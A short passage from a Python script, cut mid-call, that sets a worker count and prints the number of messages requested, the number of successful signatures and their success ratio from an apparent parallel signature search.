                                      num_procs=max(1, (cpu_count() or 1) - 2))

# The search stops at the first successful chunk, so num_sigs is an upper bound on the attempts made
print("Total messages requested:", num_sigs)
print("Total successful signatures:", total_success)
print("Success ratio:", total_success/num_sigs)